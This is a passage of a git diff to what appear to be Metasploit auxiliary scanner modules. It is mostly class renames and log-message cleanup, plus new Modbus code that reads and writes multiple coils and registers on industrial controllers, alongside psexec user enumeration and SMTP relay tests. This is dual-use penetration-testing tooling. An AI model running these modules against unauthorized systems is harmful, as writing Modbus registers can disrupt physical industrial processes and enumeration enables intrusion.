b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb index 0838eae12e..1893540379 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_realport_version.rb b/modules/auxiliary/scanner/scada/digi_realport_version.rb index b0a9ea2d1c..eb6c6aad89 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_version.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb index 6b8acd99f2..ab3545a5bf 100644 --- a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb index ecf1f50a29..83e248ba52 100644 --- a/modules/auxiliary/scanner/scada/koyo_login.rb +++ b/modules/auxiliary/scanner/scada/koyo_login.rb @@ -8,7 +8,7 @@ require 'msf/core' # msfdev is going to want a bunch of other stuff for style/compat but this works # TODO: Make into a real AuthBrute module, although the password pattern is fixed -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/modbus_findunitid.rb b/modules/auxiliary/scanner/scada/modbus_findunitid.rb index d570f4281b..b58a0fe30c 100644 --- a/modules/auxiliary/scanner/scada/modbus_findunitid.rb +++ b/modules/auxiliary/scanner/scada/modbus_findunitid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 70b5242414..325de27a11 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp @@ -20,24 +20,31 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'EsMnemon ', # original write-only module - 'Arnaud SOULLIE ' # new code that allows read/write + 'Arnaud SOULLIE ', # code that allows read/write + 'Alexandrine TORRENTS ', # code that allows reading/writing at multiple consecutive addresses + 'Mathieu CHEVALIER ' ], 'License' => MSF_LICENSE, 'Actions' => [ - ['READ_COIL', { 'Description' => 'Read one bit from a coil' } ], + ['READ_COILS', { 'Description' => 'Read bits from several coils' } ], + ['READ_REGISTERS', { 'Description' => 'Read words from several registers' } ], ['WRITE_COIL', { 'Description' => 'Write one bit to a coil' } ], - ['READ_REGISTER', { 'Description' => 'Read one word from a register' } ], - ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ] + ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ], + ['WRITE_COILS', { 'Description' => 'Write bits to several coils' } ], + ['WRITE_REGISTERS', { 'Description' => 'Write words to several registers' } ] ], - 'DefaultAction' => 'READ_REGISTER' + 'DefaultAction' => 'READ_REGISTERS' )) register_options( [ Opt::RPORT(502), - OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]), OptInt.new('DATA_ADDRESS', [true, "Modbus data address"]), + OptInt.new('NUMBER', [false, "Number of coils/registers to read (READ_COILS ans READ_REGISTERS modes only)", 1]), + OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]), + OptString.new('DATA_COILS', [false, "Data in binary to write (WRITE_COILS mode only) e.g. 0110"]), + OptString.new('DATA_REGISTERS', [false, "Words to write to each register separated with a comma (WRITE_REGISTERS mode only) e.g. 1,2,3,4"]), OptInt.new('UNIT_NUMBER', [false, "Modbus unit number", 1]), ], self.class) @@ -63,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") - payload += [1].pack("n") + payload += [datastore['NUMBER']].pack("n") make_payload(payload) end @@ -79,6 +86,21 @@ class Metasploit3 < Msf::Auxiliary packet_data end + def make_write_coils_payload(data, byte) + payload = [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [datastore['DATA_COILS'].size].pack("n") # bit count + payload += [byte].pack("c") # byte count + for i in 0..(byte-1) + payload += [data[i]].pack("b*") + end + + packet_data = make_payload(payload) + + packet_data + end + def make_write_register_payload(data) payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") @@ -88,6 +110,19 @@ class Metasploit3 < Msf::Auxiliary make_payload(payload) end + def make_write_registers_payload(data, size) + payload = [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [size].pack("n") # word count + payload += [2*size].pack("c") # byte count + for i in 0..(size-1) + payload += [data[i]].pack("n") + end + + make_payload(payload) + end + def handle_error(response) case response.reverse.unpack("c")[0].to_i when 1 @@ -106,34 +141,57 @@ class Metasploit3 < Msf::Auxiliary return end - def read_coil + def read_coils + if datastore['NUMBER']+datastore['DATA_ADDRESS'] > 65535 + print_error("Coils addresses go from 0 to 65535. You cannot go beyond.") + return + end @function_code = 0x1 - print_status("Sending READ COIL...") + print_status("Sending READ COILS...") response = send_frame(make_read_payload) + values = [] if response.nil? - print_error("No answer for the READ COIL") + print_error("No answer for the READ COILS") return elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) elsif response.unpack("C*")[7] == @function_code - value = response[9].unpack("c")[0] - print_good("Coil value at address #{datastore['DATA_ADDRESS']} : #{value}") + loop = (datastore['NUMBER']-1)/8 + for i in 0..loop + bin_value = response[9+i].unpack("b*")[0] + list = bin_value.split("") + for j in 0..7 + list[j] = list[j].to_i + values[i*8 + j] = list[j] + end + end + values = values[0..(datastore['NUMBER']-1)] + print_good("#{datastore['NUMBER']} coil values from address #{datastore['DATA_ADDRESS']} : ") + print_good("#{values}") else print_error("Unknown answer") end end - def read_register + def read_registers + if datastore['NUMBER']+datastore['DATA_ADDRESS'] > 65535 + print_error("Registers addresses go from 0 to 65535. You cannot go beyond.") + return + end @function_code = 3 - print_status("Sending READ REGISTER...") + print_status("Sending READ REGISTERS...") response = send_frame(make_read_payload) + values = [] if response.nil? - print_error("No answer for the READ REGISTER") + print_error("No answer for the READ REGISTERS") elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) elsif response.unpack("C*")[7] == @function_code - value = response[9..10].unpack("n")[0] - print_good("Register value at address #{datastore['DATA_ADDRESS']} : #{value}") + for i in 0..(datastore['NUMBER']-1) + values.push(response[9+2*i..10+2*i].unpack("n")[0]) + end + print_good("#{datastore['NUMBER']} register values from address #{datastore['DATA_ADDRESS']} : ") + print_good("#{values}") else print_error("Unknown answer") end @@ -162,6 +220,39 @@ class Metasploit3 < Msf::Auxiliary end end + def write_coils + @function_code = 15 + temp = datastore['DATA_COILS'] + check = temp.split("") + if temp.size > 65535 + print_error("DATA_COILS size must be between 0 and 65535") + return + end + for j in check + if j=="0" or j=="1" + else + print_error("DATA_COILS value must only contain 0s and 1s without space") + return + end + end + byte_number = (temp.size-1)/8 + 1 + data = [] + for i in 0..(byte_number-1) + data.push(temp[(i*8+0)..(i*8+7)]) + end + print_status("Sending WRITE COILS...") + response = send_frame(make_write_coils_payload(data, byte_number)) + if response.nil? + print_error("No answer for the WRITE COILS") + elsif response.unpack("C*")[7] == (0x80 | @function_code) + handle_error(response) + elsif response.unpack("C*")[7] == @function_code + print_good("Values #{datastore['DATA_COILS']} successfully written from coil address #{datastore['DATA_ADDRESS']}") + else + print_error("Unknown answer") + end + end + def write_register @function_code = 6 if datastore['DATA'] < 0 || datastore['DATA'] > 65535 @@ -181,18 +272,74 @@ class Metasploit3 < Msf::Auxiliary end end + def write_registers + @function_code = 16 + check = datastore['DATA_REGISTERS'].split("") + for j in 0..(check.size-1) + if check[j] == "0" or check[j]== "1" or check[j]== "2" or check[j]== "3" or check[j]== "4" or check[j]== "5" or check[j]== "6" or check[j]== "7" or check[j]== "8" or check[j]== "9" or check[j]== "," + if check[j] == "," and check[j+1] == "," + print_error("DATA_REGISTERS cannot contain two consecutive commas") + return + end + else + print_error("DATA_REGISTERS value must only contain numbers and commas without space") + return + end + end + list = datastore['DATA_REGISTERS'].split(",") + if list.size+datastore['DATA_ADDRESS'] > 65535 + print_error("Registers addresses go from 0 to 65535. You cannot go beyond.") + return + end + data = [] + for i in 0..(list.size-1) + data[i] = list[i].to_i + end + for j in 0..(data.size-1) + if data[j] < 0 || data[j] > 65535 + print_error("Each word to write must be an integer between 0 and 65535 in WRITE_REGISTERS mode") + return + end + end + print_status("Sending WRITE REGISTERS...") + response = send_frame(make_write_registers_payload(data, data.size)) + if response.nil? + print_error("No answer for the WRITE REGISTERS") + elsif response.unpack("C*")[7] == (0x80 | @function_code) + handle_error(response) + elsif response.unpack("C*")[7] == @function_code + print_good("Values #{datastore['DATA_REGISTERS']} successfully written from registry address #{datastore['DATA_ADDRESS']}") + else + print_error("Unknown answer") + end + end + def run @modbus_counter = 0x0000 # used for modbus frames connect case action.name - when "READ_COIL" - read_coil - when "READ_REGISTER" - read_register + when "READ_COILS" + read_coils + when "READ_REGISTERS" + read_registers when "WRITE_COIL" write_coil when "WRITE_REGISTER" write_register + when "WRITE_COILS" + if datastore['DATA_COILS'] == nil + print_error("The following option is needed in WRITE_COILS mode: DATA_COILS.") + return + else + write_coils + end + when "WRITE_REGISTERS" + if datastore['DATA_REGISTERS'] == nil + print_error("The following option is needed in WRITE_REGISTERS mode: DATA_REGISTERS.") + return + else + write_registers + end else print_error("Invalid ACTION") end diff --git a/modules/auxiliary/scanner/scada/modbusdetect.rb b/modules/auxiliary/scanner/scada/modbusdetect.rb index 7740955785..3eff2c7567 100644 --- a/modules/auxiliary/scanner/scada/modbusdetect.rb +++ b/modules/auxiliary/scanner/scada/modbusdetect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb index c584b0e939..d9dfc144ff 100644 --- a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index dc9bcb0b3a..9622c45419 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 134cf2a2b1..f136b4e210 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 01dc953c4e..dbfb95bb4f 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index 581283c74e..21f0ae4ff4 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb index 590b4c3a46..a98910c8ca 100644 --- a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb +++ b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 67304ca6ba..334adfa2bf 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index b7c68054c6..b884e8ce45 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 5929b84dbf..c150e7e810 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary connect smb_login rescue StandardError => autherror - print_error("#{peer} - #{autherror}") + print_error("#{autherror}") return end @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary output.each_line { |line| cleanout << line.chomp if line.include?("HKEY") && line.split("-").size == 8 && !line.split("-")[7].include?("_")} return cleanout rescue StandardError => hku_error - print_error("#{peer} - Error runing query against HKU. #{hku_error.class}. #{hku_error}") + print_error("Error runing query against HKU. #{hku_error.class}. #{hku_error}") return nil end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary simple.disconnect("\\\\#{ip}\\#{smbshare}") return output rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + print_error("Error getting command output. #{output_error.class}. #{output_error}.") return false end end @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary domain = line if line.include?("USERDOMAIN") end if domain.split(" ")[2].to_s.chomp + "\\" + username.split(" ")[2].to_s.chomp == datastore['USERNAME'] - print_good("#{peer} - #{datastore['USERNAME']} is logged in") + print_good("#{datastore['USERNAME']} is logged in") report_user(datastore['USERNAME']) end return @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary end if username.length > 0 && domain.length > 0 user = domain.split(" ")[2].to_s + "\\" + username.split(" ")[2].to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) elsif logonserver.length > 0 && homepath.length > 0 uname = homepath.split('\\')[homepath.split('\\').size - 1] @@ -158,24 +158,24 @@ class Metasploit3 < Msf::Auxiliary uname = uname.split(".")[0] end user = logonserver.split('\\\\')[1].chomp.to_s + "\\" + uname.to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else username = query_session(smbshare, ip, cmd, text, bat) if username hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." user = "#{hostname}\\#{username}" - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else - print_status("#{peer} - Unable to determine user information for user: #{key}") + print_status("Unable to determine user information for user: #{key}") end end else - print_status("#{peer} - Could not determine logged in users") + print_status("Could not determine logged in users") end rescue Rex::Proto::SMB::Exceptions::Error => check_error - print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") + print_error("Error checking reg key. #{check_error.class}. #{check_error}") return check_error end end @@ -185,12 +185,12 @@ class Metasploit3 < Msf::Auxiliary begin # Try and do cleanup command cleanup = "#{cmd} /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup") + print_status("Executing cleanup") out = psexec(cleanup) rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands: #{cleanuperror}") - print_warning("#{peer} - Maybe %SYSTEMDRIVE%#{text} must be deleted manually") - print_warning("#{peer} - Maybe #{bat} must be deleted manually") + print_error("Unable to processes cleanup commands: #{cleanuperror}") + print_warning("Maybe %SYSTEMDRIVE%#{text} must be deleted manually") + print_warning("Maybe #{bat} must be deleted manually") return cleanuperror end end diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index d145bd5b26..f54004bbe9 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should go first include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb index 1100dd05c1..e33bc911d1 100644 --- a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb +++ b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/group_policy_preferences' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index e4118ded74..cb1f1081d1 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client @@ -408,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary end subdirs.shift end - print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true + print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] end unless detailed_tbl.rows.empty? if datastore['LogSpider'] == '1' diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index 3238c66dfc..172746cbb8 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index e8775e681f..6867ca1d20 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 0fdf529ca7..1fe83ba462 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smb' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index eddfc7c841..e440845a29 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb index abed2f4c4f..9ffcc26c16 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC @@ -255,13 +255,13 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" case check_host(ip) when Exploit::CheckCode::Vulnerable - print_good("#{peer} - The target is vulnerable to CVE-2015-0240.") + print_good("The target is vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Appears - print_good("#{peer} - The target appears to be vulnerable to CVE-2015-0240.") + print_good("The target appears to be vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Detected - print_status("#{peer} - The target appears to be running Samba.") + print_status("The target appears to be running Samba.") else - print_status("#{peer} - The target appears to be safe") + print_status("The target appears to be safe") end end diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index 9a1c016918..779de20c9f 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'recog' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 7ff74bee87..ba2a9d2604 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb index eae920be73..e259235d43 100644 --- a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb +++ b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_relay.rb b/modules/auxiliary/scanner/smtp/smtp_relay.rb index 1c5be24aad..cc85ccee35 100644 --- a/modules/auxiliary/scanner/smtp/smtp_relay.rb +++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary begin connect banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) - print_status("#{peer} - SMTP #{banner_sanitized}") + print_status("SMTP #{banner_sanitized}") report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner) if datastore['EXTENDED'] @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary do_test_relay(nil, "MAIL FROM:<#{datastore['MAILFROM']}>", "RCPT TO:<#{datastore['MAILTO']}>") end rescue - print_error("#{peer} - Unable to establish an SMTP session") + print_error("Unable to establish an SMTP session") return end end @@ -86,36 +86,36 @@ class Metasploit3 < Msf::Auxiliary connect res = raw_send_recv("EHLO X\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailfrom}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailto}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("DATA\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") if res =~ /250/ if testnumber.nil? - print_good("#{peer} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") else - print_good("#{peer} - Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") end else if testnumber.nil? - print_status "#{peer} - No relay detected" + print_status "No relay detected" else - print_status "#{peer} - Test ##{testnumber} - No relay detected" + print_status "Test ##{testnumber} - No relay detected" end end rescue - print_error("#{peer} - Test ##{testnumber} - Unable to establish an SMTP session") + print_error("Test ##{testnumber} - Unable to establish an SMTP session") return end end diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index 54069a0dfb..6e6369efe3 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index 99d8353ee0..e75cd693f7 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/arris_dg950.rb b/modules/auxiliary/scanner/snmp/arris_dg950.rb index a071e85520..91efc6d3b9 100644 --- a/modules/auxiliary/scanner/snmp/arris_dg950.rb +++ b/modules/auxiliary/scanner/snmp/arris_dg950.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index f78cc130b9..7921276cb0 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 6f4172e35d..f0c7d77486 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include 